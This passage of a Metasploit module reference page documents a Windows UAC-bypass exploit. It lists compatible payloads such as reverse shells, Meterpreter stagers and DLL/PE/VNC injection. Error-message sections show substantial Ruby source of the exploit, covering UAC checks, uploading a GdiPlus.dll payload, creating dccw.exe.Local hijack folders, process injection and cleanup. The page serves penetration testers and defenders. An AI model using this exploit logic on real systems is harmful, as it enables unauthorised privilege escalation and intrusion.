   80   payload/windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   81   payload/windows/patchupdllinject/reverse_tcp_rc4                             normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   82   payload/windows/patchupdllinject/reverse_tcp_rc4_dns                         normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   83   payload/windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   84   payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   85   payload/windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   86   payload/windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   87   payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   88   payload/windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   89   payload/windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   90   payload/windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   91   payload/windows/patchupmeterpreter/bind_tcp_rc4                              normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   92   payload/windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   93   payload/windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   94   payload/windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   95   payload/windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   96   payload/windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   97   payload/windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   98   payload/windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   99   payload/windows/patchupmeterpreter/reverse_tcp_rc4                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   100  payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   101  payload/windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   102  payload/windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   103  payload/windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   104  payload/windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   105  payload/windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   106  payload/windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   107  payload/windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   108  payload/windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   109  payload/windows/peinject/bind_tcp_rc4                                        normal  No     Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   110  payload/windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   111  payload/windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   112  payload/windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   113  payload/windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   114  payload/windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   115  payload/windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   116  payload/windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   117  payload/windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   118  payload/windows/peinject/reverse_tcp_rc4                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   119  payload/windows/peinject/reverse_tcp_rc4_dns                                 normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   120  payload/windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   121  payload/windows/powershell_bind_tcp                                          normal  No     Windows Interactive Powershell Session, Bind TCP
   122  payload/windows/powershell_reverse_tcp                                       normal  No     Windows Interactive Powershell Session, Reverse TCP
   123  payload/windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   124  payload/windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   125  payload/windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   126  payload/windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   127  payload/windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   128  payload/windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   129  payload/windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   130  payload/windows/shell/bind_tcp_rc4                                           normal  No     Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   131  payload/windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   132  payload/windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   133  payload/windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   134  payload/windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   135  payload/windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   136  payload/windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   137  payload/windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   138  payload/windows/shell/reverse_tcp_rc4                                        normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   139  payload/windows/shell/reverse_tcp_rc4_dns                                    normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   140  payload/windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   141  payload/windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   142  payload/windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   143  payload/windows/shell_bind_tcp_xpfw                                          normal  No     Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   144  payload/windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   145  payload/windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   146  payload/windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   147  payload/windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   148  payload/windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   149  payload/windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   150  payload/windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   151  payload/windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   152  payload/windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   153  payload/windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   154  payload/windows/upexec/bind_tcp_rc4                                          normal  No     Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   155  payload/windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   156  payload/windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   157  payload/windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   158  payload/windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   159  payload/windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
   160  payload/windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   161  payload/windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   162  payload/windows/upexec/reverse_tcp_rc4                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   163  payload/windows/upexec/reverse_tcp_rc4_dns                                   normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   164  payload/windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   165  payload/windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   166  payload/windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   167  payload/windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   168  payload/windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   169  payload/windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   170  payload/windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   171  payload/windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   172  payload/windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   173  payload/windows/vncinject/bind_tcp_rc4                                       normal  No     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   174  payload/windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   175  payload/windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   176  payload/windows/vncinject/reverse_http                                       normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   177  payload/windows/vncinject/reverse_http_proxy_pstore                          normal  No     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   178  payload/windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   179  payload/windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   180  payload/windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   181  payload/windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   182  payload/windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   183  payload/windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   184  payload/windows/vncinject/reverse_tcp_rc4                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   185  payload/windows/vncinject/reverse_tcp_rc4_dns                                normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   186  payload/windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   187  payload/windows/vncinject/reverse_winhttp                                    normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)

Evasion Options


Here is the full list of possible evasion options supported by the windows/local/bypassuac_injection_winsxs exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/local/bypassuac_injection_winsxs) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

UAC set to DoNotPrompt - using ShellExecute "runas" method instead


Here is a relevant code snippet related to the "UAC set to DoNotPrompt - using ShellExecute "runas" method instead" error message:

66:	                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
67:	    when UAC_DEFAULT
68:	      print_good('UAC is set to Default')
69:	      print_good('BypassUAC can bypass this setting, continuing...')
70:	    when UAC_NO_PROMPT
71:	      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
72:	      shell_execute_exe
73:	      return
74:	    end
75:	
76:	    dll_path = bypass_dll_path

x64 Target Selected for x86 System


Here is a relevant code snippet related to the "x64 Target Selected for x86 System" error message:

99:	    path = ::File.join(Msf::Config.data_directory, 'post')
100:	
101:	    sysarch = sysinfo['Architecture']
102:	    if sysarch == ARCH_X86
103:	      if (target_arch.first =~ /64/i) || (payload_instance.arch.first =~ /64/i)
104:	        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
105:	      else
106:	        ::File.join(path, "bypassuac-x86.dll")
107:	      end
108:	    else
109:	      unless (target_arch.first =~ /64/i) && (payload_instance.arch.first =~ /64/i)

x86 Target Selected for x64 System


Here is a relevant code snippet related to the "x86 Target Selected for x64 System" error message:

105:	      else
106:	        ::File.join(path, "bypassuac-x86.dll")
107:	      end
108:	    else
109:	      unless (target_arch.first =~ /64/i) && (payload_instance.arch.first =~ /64/i)
110:	        fail_with(Failure::BadConfig, 'x86 Target Selected for x64 System')
111:	      else
112:	        ::File.join(path, "bypassuac-x64.dll")
113:	      end
114:	    end
115:	  end

Either whoami is not there or failed to execute


Here is a relevant code snippet related to the "Either whoami is not there or failed to execute" error message:

119:	    # Check if you are an admin
120:	    vprint_status('Checking admin status...')
121:	    admin_group = is_in_admin_group?
122:	
123:	    if admin_group.nil?
124:	      print_error('Either whoami is not there or failed to execute')
125:	      print_error('Continuing under assumption you already checked...')
126:	    else
127:	      if admin_group
128:	        print_good('Part of Administrators group! Continuing...')
129:	      else

Continuing under assumption you already checked...


Here is a relevant code snippet related to the "Continuing under assumption you already checked..." error message:

120:	    vprint_status('Checking admin status...')
121:	    admin_group = is_in_admin_group?
122:	
123:	    if admin_group.nil?
124:	      print_error('Either whoami is not there or failed to execute')
125:	      print_error('Continuing under assumption you already checked...')
126:	    else
127:	      if admin_group
128:	        print_good('Part of Administrators group! Continuing...')
129:	      else
130:	        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

Not in admins group, cannot escalate with this module


Here is a relevant code snippet related to the "Not in admins group, cannot escalate with this module" error message:

125:	      print_error('Continuing under assumption you already checked...')
126:	    else
127:	      if admin_group
128:	        print_good('Part of Administrators group! Continuing...')
129:	      else
130:	        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
131:	      end
132:	    end
133:	
134:	    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
135:	      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')

Cannot BypassUAC from Low Integrity Level


Here is a relevant code snippet related to the "Cannot BypassUAC from Low Integrity Level" error message:

130:	        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
131:	      end
132:	    end
133:	
134:	    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
135:	      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
136:	    end
137:	  end
138:	
139:	  # Inject and run the DLL within a trusted certificate signed process to invoke IFileOperation
140:	  def run_injection(pid, dll_path, file_paths)

Failed to Inject Payload to <PID>!


Here is a relevant code snippet related to the "Failed to Inject Payload to <PID>!" error message:

153:	      vprint_status('Executing payload')
154:	      thread = host_process.thread.create(exploit_mem + offset, struct_addr)
155:	      print_good("Successfully injected payload in to process: #{pid}")
156:	      client.railgun.kernel32.WaitForSingleObject(thread.handle, 14000)
157:	    rescue Rex::Post::Meterpreter::RequestError => e
158:	      print_error("Failed to Inject Payload to #{pid}!")
159:	      vprint_error(e.to_s)
160:	    end
161:	  end
162:	
163:	  # Create a process in the native architecture

Spawning Process failed...


Here is a relevant code snippet related to the "Spawning Process failed..." error message:

169:	      cmd = "#{win_dir}\\System32\\notepad.exe"
170:	    end
171:	    pid = cmd_exec_get_pid(cmd)
172:	
173:	    unless pid
174:	      fail_with(Failure::Unknown, 'Spawning Process failed...')
175:	    end
176:	
177:	    pid
178:	  end
179:	

Error uploading file <DIRECTORYNAMES:0>: <E.CLASS> <E>


Here is a relevant code snippet related to the "Error uploading file <DIRECTORYNAMES:0>: <E.CLASS> <E>" error message:

184:	    print_status('Uploading the Payload DLL to the filesystem...')
185:	    begin
186:	      vprint_status("Payload DLL #{payload.length} bytes long being uploaded...")
187:	      write_file(dllPath, payload)
188:	    rescue Rex::Post::Meterpreter::RequestError => e
189:	      fail_with(Failure::Unknown, "Error uploading file #{directoryNames[0]}: #{e.class} #{e}")
190:	    end
191:	
192:	    if directoryNames.size > 1
193:	      copy_payload_dll(directoryNames, dllPath)
194:	    end

Error! Cannot copy the payload to all the necessary folders! Continuing just in case it works...


Here is a relevant code snippet related to the "Error! Cannot copy the payload to all the necessary folders! Continuing just in case it works..." error message:

196:	
197:	  # Copy our DLL to all created folders, the first folder already have a copy of the DLL
198:	  def copy_payload_dll(directoryNames, dllPath)
199:	    1.step(directoryNames.size - 1, 1) do |i|
200:	      if client.railgun.kernel32.CopyFileA(dllPath, "#{directoryNames[i]}\\GdiPlus.dll", false)['return'] == false
201:	        print_error("Error! Cannot copy the payload to all the necessary folders! Continuing just in case it works...")
202:	      end
203:	    end
204:	  end
205:	
206:	  # Check if the environment is vulnerable to the exploit

Already in elevated state


Here is a relevant code snippet related to the "Already in elevated state" error message:

203:	    end
204:	  end
205:	
206:	  # Check if the environment is vulnerable to the exploit
207:	  def validate_environment!
208:	    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
209:	
210:	    winver = sysinfo['OS']
211:	
212:	    case winver
213:	    when /Windows (8|10)/

<WINVER> is not vulnerable.


Here is a relevant code snippet related to the "<WINVER> is not vulnerable." error message:

211:	
212:	    case winver
213:	    when /Windows (8|10)/
214:	      print_good("#{winver} may be vulnerable.")
215:	    else
216:	      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
217:	    end
218:	
219:	    if is_uac_enabled?
220:	      print_status('UAC is Enabled, checking level...')
221:	    else

Not in admins group, cannot escalate with this module


Here is a relevant code snippet related to the "Not in admins group, cannot escalate with this module" error message:

218:	
219:	    if is_uac_enabled?
220:	      print_status('UAC is Enabled, checking level...')
221:	    else
222:	      unless is_in_admin_group?
223:	        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
224:	      end
225:	    end
226:	  end
227:	
228:	  # Creating the necessary directories to perform the DLL hijacking

Cannot create the directory "<VALUE>dccw.exe.Local"


Here is a relevant code snippet related to the "Cannot create the directory "<VALUE>dccw.exe.Local"" error message:

231:	  def create_directories(payload_filepath, directoryNames)
232:	    env_vars = get_envs('TEMP')
233:	
234:	    print_status("Creating temporary folders...")
235:	    if client.railgun.kernel32.CreateDirectoryA(payload_filepath, nil)['return'] == 0
236:	      fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\"")
237:	    end
238:	
239:	    directoryNames.each do |dirName|
240:	      if client.railgun.kernel32.CreateDirectoryA(dirName, nil)['return'] == 0
241:	        fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\\#{dirName}\"")

Cannot create the directory "<VALUE>dccw.exe.Local\<DIRNAME>"


Here is a relevant code snippet related to the "Cannot create the directory "<VALUE>dccw.exe.Local\<DIRNAME>"" error message:

236:	      fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\"")
237:	    end
238:	
239:	    directoryNames.each do |dirName|
240:	      if client.railgun.kernel32.CreateDirectoryA(dirName, nil)['return'] == 0
241:	        fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\\#{dirName}\"")
242:	      end
243:	    end
244:	  end
245:	
246:	  # Get all the directories that match with the initial pattern

Cannot get the targeted directories!


Here is a relevant code snippet related to the "Cannot get the targeted directories!" error message:

250:	    maxPath = client.railgun.const("MAX_PATH")
251:	    fileNamePadding = 44
252:	
253:	    hFile = client.railgun.kernel32.FindFirstFileA(targetedDirectories, findFileDataSize)
254:	    if hFile['return'] == client.railgun.const("INVALID_HANDLE_VALUE")
255:	      fail_with(Failure::Unknown, "Cannot get the targeted directories!")
256:	    end
257:	
258:	    findFileData = hFile['lpFindFileData']
259:	    moreFiles = true
260:	    until moreFiles == false do

GetLastError


Here is a relevant code snippet related to the "GetLastError" error message:

270:	      findNextFile = client.railgun.kernel32.FindNextFileA(hFile['return'], findFileDataSize)
271:	      moreFiles = findNextFile['return']
272:	      findFileData = findNextFile['lpFindFileData']
273:	    end
274:	
275:	    if findNextFile['GetLastError'] != client.railgun.const("ERROR_NO_MORE_FILES")
276:	      fail_with(Failure::Unknown, "Cannot get the targeted directories!")
277:	    end
278:	
279:	    directoryNames
280:	  end

Cannot get the targeted directories!


Here is a relevant code snippet related to the "Cannot get the targeted directories!" error message:

271:	      moreFiles = findNextFile['return']
272:	      findFileData = findNextFile['lpFindFileData']
273:	    end
274:	
275:	    if findNextFile['GetLastError'] != client.railgun.const("ERROR_NO_MORE_FILES")
276:	      fail_with(Failure::Unknown, "Cannot get the targeted directories!")
277:	    end
278:	
279:	    directoryNames
280:	  end
281:	

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

355:	
356:	      begin
357:	        droppedElements.push("#{dirName}\\GdiPlus.dll")
358:	        session.fs.file.rm("#{dirName}\\GdiPlus.dll")
359:	      rescue ::Rex::Post::Meterpreter::RequestError => e
360:	        vprint_error("Error => #{e.class} - #{e}")
361:	      end
362:	
363:	      begin
364:	        droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
365:	        session.fs.file.rm("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

362:	
363:	      begin
364:	        droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
365:	        session.fs.file.rm("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
366:	      rescue ::Rex::Post::Meterpreter::RequestError => e
367:	        vprint_error("Error => #{e.class} - #{e}")
368:	      end
369:	    end
370:	  end
371:	
372:	  # Remove folders from "C:\%TEMP%\dccw.exe.Local\" and "C:\Windows\System32\dccw.exe.Local\"

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

376:	
377:	      begin
378:	        droppedElements.push(dirName)
379:	        session.fs.dir.rmdir(dirName)
380:	      rescue ::Rex::Post::Meterpreter::RequestError => e
381:	        vprint_error("Error => #{e.class} - #{e}")
382:	      end
383:	
384:	      begin
385:	        droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}")
386:	        session.fs.dir.rmdir("#{file_paths[:szElevDllFull]}\\#{directoryName}")

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

383:	
384:	      begin
385:	        droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}")
386:	        session.fs.dir.rmdir("#{file_paths[:szElevDllFull]}\\#{directoryName}")
387:	      rescue ::Rex::Post::Meterpreter::RequestError => e
388:	        vprint_error("Error => #{e.class} - #{e}")
389:	      end
390:	    end
391:	  end
392:	
393:	  # Remove "C:\Windows\System32\dccw.exe.Local" folder

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

394:	  def remove_dot_local_folders(session, file_paths, droppedElements)
395:	    begin
396:	      droppedElements.push(file_paths[:szTempDllPath])
397:	      session.fs.dir.rmdir(file_paths[:szTempDllPath])
398:	    rescue ::Rex::Post::Meterpreter::RequestError => e
399:	      vprint_error("Error => #{e.class} - #{e}")
400:	    end
401:	
402:	    begin
403:	      droppedElements.push(file_paths[:szElevDllFull])
404:	      session.fs.dir.rmdir(file_paths[:szElevDllFull])

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

401:	
402:	    begin
403:	      droppedElements.push(file_paths[:szElevDllFull])
404:	      session.fs.dir.rmdir(file_paths[:szElevDllFull])
405:	    rescue ::Rex::Post::Meterpreter::RequestError => e
406:	      vprint_error("Error => #{e.class} - #{e}")
407:	    end
408:	  end
409:	
410:	  # Check if have been successfully removed
411:	  def removal_checking(droppedElements)

Unable to delete <ELEMENT>!


Here is a relevant code snippet related to the "Unable to delete <ELEMENT>!" error message:

413:	
414:	    droppedElements.each do |element|
415:	      begin
416:	        stat = session.fs.file.stat(element)
417:	        if stat
418:	          print_error("Unable to delete #{element}!")
419:	          successfullyRemoved = false
420:	        end
421:	      rescue ::Rex::Post::Meterpreter::RequestError => e
422:	        vprint_error("Error => #{e.class} - #{e}")
423:	      end

Error => <E.CLASS> - <E>


Here is a relevant code snippet related to the "Error => <E.CLASS> - <E>" error message:

417:	        if stat
418:	          print_error("Unable to delete #{element}!")
419:	          successfullyRemoved = false
420:	        end
421:	      rescue ::Rex::Post::Meterpreter::RequestError => e
422:	        vprint_error("Error => #{e.class} - #{e}")
423:	      end
424:	    end
425:	
426:	    if successfullyRemoved
427:	      print_good("All the dropped elements have been successfully removed")

Could not delete some dropped elements! They will require manual cleanup on the target


Here is a relevant code snippet related to the "Could not delete some dropped elements! They will require manual cleanup on the target" error message:

422:	        vprint_error("Error => #{e.class} - #{e}")
423:	      end
424:	    end
425:	
426:	    if successfullyRemoved
427:	      print_good("All the dropped elements have been successfully removed")
428:	    else
429:	      print_warning("Could not delete some dropped elements! They will require manual cleanup on the target")
430:	    end
431:	  end
432:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Ernesto Fernandez "L3cr0f" <ernesto.fernpro[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.